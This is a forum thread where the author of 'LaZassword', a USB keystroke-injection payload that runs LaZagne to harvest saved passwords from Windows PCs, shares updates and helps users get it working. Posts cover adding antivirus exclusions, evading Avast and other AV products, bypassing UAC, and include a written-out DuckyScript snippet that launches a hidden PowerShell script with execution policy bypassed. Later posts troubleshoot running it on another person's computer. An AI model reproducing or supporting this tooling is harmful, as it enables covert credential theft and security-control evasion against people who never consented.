[PAYLOAD] LaZassword

[kuyaya]

I wrote a password grabber payload using Lazagne. I made a github repository, you can look it up here. I tried to make it as simple as possible. If there are any questions or advices for improvement, just post them here and I'll reply. Have fun with it!

[Cap_Sig]

Nice payload!

One issue is I'm pretty sure this will only work on a machine running Windows Defender.  When adding the exception for the drive letter this will not work if the system has Windows Defender disabled due to having something like AVG installed as AV program. 

I plan to mess around with the payload some and post back.

[kuyaya]

On 1/29/2020 at 3:04 PM, Cap_Sig said:

Nice payload!

One issue is I'm pretty sure this will only work on a machine running Windows Defender.  When adding the exception for the drive letter this will not work if the system has Windows Defender disabled due to having something like AVG installed as AV program. 

I plan to mess around with the payload some and post back.

Thank you 😄

Hmmmm....Do you know a way on how to turn off/make an exclusion on all AV's? I don't like scripts who just delete the whole AV, because that leaves many traces

[narko]

So I tried yours and Password Grabber, for some reason both are creating a folder "LaZassword" in loot folder but nothing there, empty..
Any chance I missed anything? (Yeah I'm a newbie)

[kuyaya]

On 2/11/2020 at 1:53 AM, narko said:

So I tried yours and Password Grabber, for some reason both are creating a folder "LaZassword" in loot folder but nothing there, empty..
Any chance I missed anything? (Yeah I'm a newbie)

Yep, got a mistake in the payload, I'm sorry. Fixed it. Go to my github and try it again please.

But the password grabber payload shouldn't be creating a lazassword folder. It is normal for the password grabber payload not to work haha. I think you got the payload.txt mixed up.

Please inform me if you tried it again and tell me if it has worked or not.

 

[narko]

 

It is seems like everything is running, not in the background though.
After looking inside loot folder I saw a new folder empty folder 'Lazassword'.

[kuyaya]

On 2/15/2020 at 9:48 PM, narko said:

 

It is seems like everything is running, not in the background though.
After looking inside loot folder I saw a new folder empty folder 'Lazassword'.

Is your issue solved? Or is it still persistent?

[kuyaya]

Update on the payload incoming.

[kuyaya]

Great, update is out! Now you can rely on the LED FINISH. I did this with a very easy while loop. You can look it up in the payload.txt. But that didn't work and I asked myself why. Then I did research and I found this post. This guy had the same idea as I. The reason it didn't work is, that if you create a file in the bunny while SSH, you can't see it in the explorer. Example: 
 

Quote

 

root@bunny:~# mount -o sync /dev/nandf /root/udisk
root@bunny:~# cd /root/udisk/loot
root@bunny:~/udisk/loot# ls
root@bunny:~/udisk/loot# nano testfile

root@bunny:~/udisk/loot# ls
testfile

 

Got it? Now, there should be a testfile in explorer, but there isn't. Try it yourself, if you don't belive me.

It also doesn't work the other way around. If you create a file in the loot folder by hand or with powershell (both does the same), it does show up in the bunny but the bunny can't recognize it. Example:

Quote

root@bunny:~# ls -l /root/udisk/loot/
ls: cannot access /root/udisk/loot/icreatedthisinexplorer.txt: No such file or directory
total 0
-????????? ? ? ? ?            ? icreatedthisinexplorer.txt

See that? It just doesn't work together. It doesn't work from bunny to explorer, and also from explorer to bunny.

The reason why this is even necessary is, that the while loop checks if there is a "done" file. If that isn't the case, it stays in LED ATTACK (yellow led). The second last part of the .ps1 file is, that it should create a "done" file in the /loot/LaZassword directory. But that wouldn't work, because the bunny wouldn't recognize it, as I explained above. That's why the last part of the .ps1 file is the ejection of the BB. Then the BB syncs with the explorer and recognizes the file, which breaks the loop, which then makes and LED FINISH. And you don't even have to laborious eject the BB by hand. That's great, isn't it?

When you eject the bunny, you can't access him through explorer anymore, but he can still run commands. You can also still connect with PuTTY, that's why this method works. After the ejection, the bunny deletes the done file (if not, the loop would only work 1 time because there would be a done file, even when the payload isn't finished yet) and does an LED FINISH.

@PoSHMagiC0de You brought me the solution, so I wrote you to the creds on my LaZassword payload. Is that okay for you? Please message me if not.

[PoSHMagiC0de]

Don't know or remember what I added but ok.

 

[kuyaya]

3 hours ago, PoSHMagiC0de said:

Don't know or remember what I added but ok.

 

You added the ejection of the bunny in this post 

 

[kuyaya]

Okay, update out! Now the payloads fully bypasses UAC and still runs lazagne as admin.

Creds go again to PoshMagicCode, for his powershell UAC bypass. Thank you, it's really useful. Check it out!

I made a pull request, so if it's good enough it would be published to the official repository. I would love to see it there!

[kuyaya]

Another update, LaZassword got accepted and is now on the official hak5 repository. Yes!

[kuyaya]

Hey guys, I'm here with another update.

There was a bug that caused that the bunny didn't eject himself. The bug was caused because the script who does the ejection, runs on the bunny. While the script tells windows to eject the bunny, the script is still in use (on the bunny). Windows doesn't support ejecting devices who are in use. That means that I had to change the script so that the ejection commands will be executed from the computer and not from the bunny. I'll upload the update probably tomorrow on my github. I will make more improvements and adjustments until I'll make another pull request for the official hak5 github, so if you want to be sure that you have the latest version of LaZassword, go to my github on not to the hak5 github.

Greetings, kuyaya

Update is now online ^^

[kuyaya]

I just found something interesting:

Avast does not detect LaZagne when you download it or even use it. At least not the free version of avast. It only detects it when you do a specified scan on the folder or directly on lazagne.

 

I'm working on bypassing all the different AV's (at least the most popular).... don't expect the update too soon but I'm working on it.

[timchrist49]

Hi, i ran into the same problem, i used the payload and there is no folder showing on the loot folder why is that ? sorry im a newbie 🙂

[kuyaya]

are you sure that you did steup everything correctly? Remember these 3 points:

lazagne.exe has to be in a zip file

change the DUCKY_LANG=** to your language

and change the word "administrators" in line 42 in bypass.ps1 to administrators in your language

 

If you did all this and it still doesn't work, we can go on to the next step of troubleshooting.

[benhsp]

On 4/29/2020 at 6:43 PM, kuyaya said:

are you sure that you did steup everything correctly? Remember these 3 points:

lazagne.exe has to be in a zip file

change the DUCKY_LANG=** to your language

and change the word "administrators" in line 42 in bypass.ps1 to administrators in your language

 

If you did all this and it still doesn't work, we can go on to the next step of troubleshooting.

Sorry for disturbing you, I have some questions now.

1.My computer language is Chinese Traditional. And its keyboard layout is QWERTY.So can I just use us.json file?

2.My default input is Chinese.This means that after USB is injected into win + R, you must enter shift to switch the input method to English before you can enter the command. Then where do I add this line of command.

3.About your third point "change the word "administrators" in line 42 in bypass.ps1 to administrators in your language". In my condition, I need to input administrators in Chinese or just in English?

Thanks again for your reply! My English is not very good, please forgive me for the bad expression

 

[kuyaya]

3 hours ago, benhsp said:

Sorry for disturbing you, I have some questions now.

1.My computer language is Chinese Traditional. And its keyboard layout is QWERTY.So can I just use us.json file?

2.My default input is Chinese.This means that after USB is injected into win + R, you must enter shift to switch the input method to English before you can enter the command. Then where do I add this line of command.

3.About your third point "change the word "administrators" in line 42 in bypass.ps1 to administrators in your language". In my condition, I need to input administrators in Chinese or just in English?

Thanks again for your reply! My English is not very good, please forgive me for the bad expression

 

Hey there

1. If the keyboard layout is the default USA one, you should be fine with the us.json file. You don't even have to do "DUCKY_LANG=us", you can just delete the line because the default language is us

2. On line 23 in the payload.txt:

delete the whole line and replace it with:

Q GUI r

Q SHIFT ENTER

# If it is shift-enter, you can leave it like that, if it is enter-shift, you have to switch shift with enter.

Q STRING "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\bypass.ps1')"

Q ENTER

3. Your computer language is in Chinese, that means it should also be in chinese. Try replacing it with something like "管理員" (got this from google translate).

If you are not sure wether it is in english or chinese, go to powershell and execute "Get-LocalGroup". Here you should see the different groups. If they are in english, "administrators" should work, if they are in chinese, "administrators" won't work. To be 100% sure, you can execute {Get-LocalGroupMember "administrators"} (without the {}). If it returns you an error, it is not in english. If it executes successfully, it is in english.

 

[benhsp]

6 hours ago, kuyaya said:

Hey there

1. If the keyboard layout is the default USA one, you should be fine with the us.json file. You don't even have to do "DUCKY_LANG=us", you can just delete the line because the default language is us

2. On line 23 in the payload.txt:

delete the whole line and replace it with:

Q GUI r

Q SHIFT ENTER

# If it is shift-enter, you can leave it like that, if it is enter-shift, you have to switch shift with enter.

Q STRING "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\bypass.ps1')"

Q ENTER

3. Your computer language is in Chinese, that means it should also be in chinese. Try replacing it with something like "管理員" (got this from google translate).

If you are not sure wether it is in english or chinese, go to powershell and execute "Get-LocalGroup". Here you should see the different groups. If they are in english, "administrators" should work, if they are in chinese, "administrators" won't work. To be 100% sure, you can execute {Get-LocalGroupMember "administrators"} (without the {}). If it returns you an error, it is not in english. If it executes successfully, it is in english.

 

Thanks!!! It works!! You are amazing!!!

[kuyaya]

I'm honored and always glad to hear that it works, thank you 🙂 

if you have another question, feel free to post it here :). 

[benhsp]

I got a problem. When I put USB into another computer. It is stuck here.How can I solve it? Thanks~

[kuyaya]

Hm, hard to tell, since I don't know when exactly this pops up. I need to know at which point of the payload this pops up.

What parts of the payload did successfully execute?

[Aaron Outhier]

English Translation:

Quote

 

Make the user account control system.

Do you want to allow this Ap p p to change your installation?

LOGIN EDITING PROCESS

Verified by: M i c r o s o f t W i n d o w s

Show more detailed information. materials are available.

 

In other words: It's the UAC prompt.